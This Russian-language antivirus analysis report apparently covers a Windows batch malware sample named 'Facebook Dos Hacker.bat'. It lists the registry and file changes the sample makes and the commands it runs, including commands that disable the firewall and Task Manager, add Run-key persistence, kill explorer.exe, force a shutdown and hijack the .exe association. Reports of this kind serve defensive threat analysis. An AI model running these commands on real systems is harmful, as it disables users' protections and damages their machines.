Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Classes\.exe] '' = 'WMAFile'
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Запускает на исполнение:
- <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoUserNameInStartMenu" /d "1" /f
- <SYSTEM32>\attrib.exe +r +a +s +h <SYSTEM32>
- <SYSTEM32>\wscript.exe "c:\msg.vbs"
- <SYSTEM32>\attrib.exe +h "Facebook Dos Hacker.bat"
- <SYSTEM32>\shutdown.exe -s -t 60 -c "50"
- <SYSTEM32>\attrib.exe +s "Facebook Dos Hacker.bat"
- <SYSTEM32>\attrib.exe +r "Facebook Dos Hacker.bat"
- <SYSTEM32>\attrib.exe +h c:\msg.vbs
- <SYSTEM32>\rundll32.exe user32,SwapMouseButton
- <SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Facebook Dos Hacker.bat""
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v PWNAGE /t REG_SZ /d <DRIVERS>\Facebook Dos Hacker.bat /f
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Pwner /t REG_SZ /d %WINDIR%\Facebook Dos Hacker.bat /f
- <SYSTEM32>\taskkill.exe /f /im explorer.exe
- <SYSTEM32>\netsh.exe firewall set opmode disable
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\Explorer.EXE
Изменяет следующие настройки проводника Windows (Windows Explorer):
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '1'
Изменения в файловой системе:
Создает следующие файлы:
- <SYSTEM32>\11501.18724
- %WINDIR%\29234.24250
- <SYSTEM32>\18745.16712
- %WINDIR%\22912.19736
- <SYSTEM32>\32562.5097
- %WINDIR%\8147.23188
- <SYSTEM32>\16537.17268
- %WINDIR%\26121.28129
- <SYSTEM32>\32416.2496
- %WINDIR%\3286.22536
- <SYSTEM32>\11471.22764
- %WINDIR%\28227.9025
- <SYSTEM32>\21138.23488
- %WINDIR%\26044.32155
- <SYSTEM32>\12075.3112
- %WINDIR%\57.18619
- <SYSTEM32>\15785.799
- %WINDIR%\5050.29465
- %WINDIR%\7340.6896
- %WINDIR%\982.8917
- <SYSTEM32>\28207.17010
- %WINDIR%\17771.2050
- <SYSTEM32>\832.13556
- %WINDIR%\18420.29559
- <SYSTEM32>\13112.19153
- %WINDIR%\26892.12689
- <SYSTEM32>\22689.6241
- %WINDIR%\25546.6466
- <SYSTEM32>\13575.5277
- %WINDIR%\4019.23785
- <SYSTEM32>\4515.22880
- %WINDIR%\2173.21931
- <SYSTEM32>\32682.3690
- %WINDIR%\9179.5394
- <SYSTEM32>\30266.5067
- %WINDIR%\578.13634
- <SYSTEM32>\2601.2526
- <SYSTEM32>\6819.7574
- <SYSTEM32>\9341.18742
- %WINDIR%\15191.19594
- <SYSTEM32>\22666.28062
- %WINDIR%\10181.28313
- <SYSTEM32>\31449.24413
- %WINDIR%\947.29735
- <SYSTEM32>\24072.11890
- %WINDIR%\3883.22109
- <SYSTEM32>\18193.17073
- %WINDIR%\19988.12728
- <SYSTEM32>\7900.24772
- %WINDIR%\594.1280
- <SYSTEM32>\30209.17847
- %WINDIR%\17594.7738
- <SYSTEM32>\28074.26794
- %WINDIR%\19230.23575
- <SYSTEM32>\18563.12665
- %WINDIR%\12532.4841
- %WINDIR%\15358.17197
- %WINDIR%\12292.7158
- <SYSTEM32>\31854.6017
- %WINDIR%\25838.6913
- <SYSTEM32>\8099.17984
- %WINDIR%\8304.17021
- <SYSTEM32>\13718.30403
- %WINDIR%\5350.15408
- <SYSTEM32>\17220.5838
- %WINDIR%\31115.29435
- <SYSTEM32>\514.24220
- %WINDIR%\5835.17126
- <SYSTEM32>\21687.29353
- %WINDIR%\3699.13227
- <SYSTEM32>\26581.30064
- %WINDIR%\1873.13767
- <SYSTEM32>\9571.6042
- %WINDIR%\17742.15731
- <SYSTEM32>\32644.31006
- <SYSTEM32>\26421.6379
- C:\21288.txt
- C:\17209.txt
- C:\9350.txt
- C:\15408.txt
- C:\18921.txt
- C:\7301.txt
- C:\23672.txt
- C:\31967.txt
- C:\28965.txt
- C:\24832.txt
- C:\22496.txt
- C:\1059.txt
- C:\20763.txt
- C:\30268.txt
- C:\22778.txt
- C:\21411.txt
- C:\11556.txt
- C:\19815.txt
- C:\24669.txt
- C:\1310.txt
- C:\29547.txt
- C:\27401.txt
- C:\32286.txt
- C:\5053.txt
- C:\18454.txt
- %TEMP%\1.tmp\Facebook Dos Hacker.bat
- C:\17376.txt
- C:\314.txt
- C:\8547.txt
- C:\9845.txt
- C:\1261.txt
- C:\3377.txt
- C:\26946.txt
- C:\31578.txt
- C:\29480.txt
- C:\20109.txt
- C:\19805.txt
- C:\31461.txt
- <SYSTEM32>\21860.2657
- %WINDIR%\17704.2581
- <SYSTEM32>\32137.27395
- %WINDIR%\14108.23680
- <SYSTEM32>\27334.408
- %WINDIR%\21261.14865
- <SYSTEM32>\24684.20834
- %WINDIR%\13537.26851
- <SYSTEM32>\17387.8417
- %WINDIR%\27800.7717
- <SYSTEM32>\12280.32538
- %WINDIR%\5329.1161
- <SYSTEM32>\15191.11873
- %WINDIR%\26746.16258
- <SYSTEM32>\10107.2235
- %WINDIR%\25668.22822
- <SYSTEM32>\20068.18716
- %WINDIR%\18094.21611
- %WINDIR%\10673.9210
- C:\18563.txt
- C:\22028.txt
- C:\26696.txt
- C:\3404.txt
- C:\14139.txt
- C:\24776.txt
- C:\19291.txt
- C:\344.txt
- C:\29081.txt
- <SYSTEM32>\14499.16239
- C:\msg.vbs
- <SYSTEM32>\16220.29396
- %WINDIR%\1107.5503
- C:\13035.txt
- C:\10955.txt
- C:\3469.txt
- C:\535.txt
Присваивает атрибут 'скрытый' для следующих файлов:
- C:\msg.vbs
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''
